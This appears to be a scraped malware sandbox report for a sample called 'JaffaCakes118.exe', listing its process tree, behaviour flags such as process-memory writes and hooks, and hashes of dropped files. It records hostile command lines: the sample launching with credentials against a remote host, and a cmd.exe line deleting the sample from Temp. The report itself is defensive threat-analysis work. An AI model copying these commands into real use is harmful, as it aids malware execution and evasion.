C:\Program Files\Internet Explorer\iexplore.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" -u pompei -p 123123 -DD -F -P 443 livesecureupdate.com /sys *.pax2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:496 CREDAT:17410 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4852
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c dir && dir && del "C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4964
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5ba1bf8cf86ec57057637af172911cd13
SHA132daf654da1afadd3021d486164516318295debf
SHA25677fb6880c4ae2e78d705501c19c9cd4a4d3d2f9e42d45e313561caa0b6c832e0
SHA51246780dd891659bde9eb87f07c857a43de3de9eccc53077b437282d1dd0c1339321399b0faa4cc2a6534396cdd4d358209bfe1f9622bda1e5681acef2b9c4a255
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5fe4e490beb62b9a4a3bf9b199dbea324
SHA10a05740d27d0aac8c798fe72924a5fcc4543ea2e
SHA256de0f251d1587eea1d80aea8a148a7829304ee442fb33f0f8c7125c62bd5f0901
SHA512e7a21bd78d5974838020d2c942b878f9a60e92e1258e98db18c97d91ba2056ed23c58610a609c4d60192e123653c27517ed898c8f7e70a64fede5510a8fca242
-
Filesize
4KB
MD51c6af8ea6bc8f76f6f337c650d2ef7b7
SHA19aaff38f63296e43090517f1da994c8c2d5422a9
SHA2569cf5d24df85889746f26e73d489693a65dab79fc519c95be64bcdc2b2ca82b6a
SHA512540dff05dcd82bb350f5c36f1b0c1d870f0fb5966c67c4b8f424a8184f96f1cbba0ed56c254f90072e4be42e802147294d91d0f20571feb52aba3075d6a9bd36
-
Filesize
4KB
MD5d24a03830318cf195ba065c94c8e12a7
SHA16c7174cda4dc233b5d8d8bdf02c3423471e608f6
SHA256b088185bad4043457014cece747bf9cf9b185dd02a443f150a5157ae7ce5784e
SHA512cba665b829e7934c145bac967d49c701a7e74afa27b01be04359f9d941347c18111e6daaa01f3a50caebebf9e87a9a3031cecc6e7c08d6c600410efc6559044d
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
57B
MD597b2de650ff2e2112fbca643c7e69e0f
SHA1556323bba3c43d1526e5ee23f73899f454282afa
SHA2569d24f2630f43ffea0c8c64826c52bd2ebaf1107cb5bb1e7e99c048437281a00b
SHA512e1972690c69ea16396235deef404d95e5219cfda389c4cc610fec28bf55aceed45bf0ed315aec69a299bfc7d34d25d73680ddcccbc3111d8d6484c00135c8b02
-
Filesize
386B
MD51218902428c2e28154d20738abfd9fcd
SHA1e776d349025239339d7bb87f27f45bce657fd330
SHA256d5ed9261184e58dfcdd6c94a4bb58e4e7dc95861695d8e330e43ea157f26761a
SHA51206d6496b3c0780dc7462e9794bc5804d4b2aab672db8fa260733c8ff5d1c3ca2f05c294b25779e4d45d8cf5ed38d10dbe378315abe930a1c93d237664ab5bfbd
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
219B
MD5c39e22147c18fc4352e58f4c000962ad
SHA1744d22c3741894018c1cabb9ab3fe4943ab3bf04
SHA2560863114b0d43b2f59f466939de7dbf7c6d15986a041ad46cad784b42f101ac9c
SHA51275cc751eba34585570c3f89848f743731a9153cced65c06c99d851dd724dab25dff610c413362f43be8729717e1a27bbd97861c2a81aaf75bebf3c38dea683bc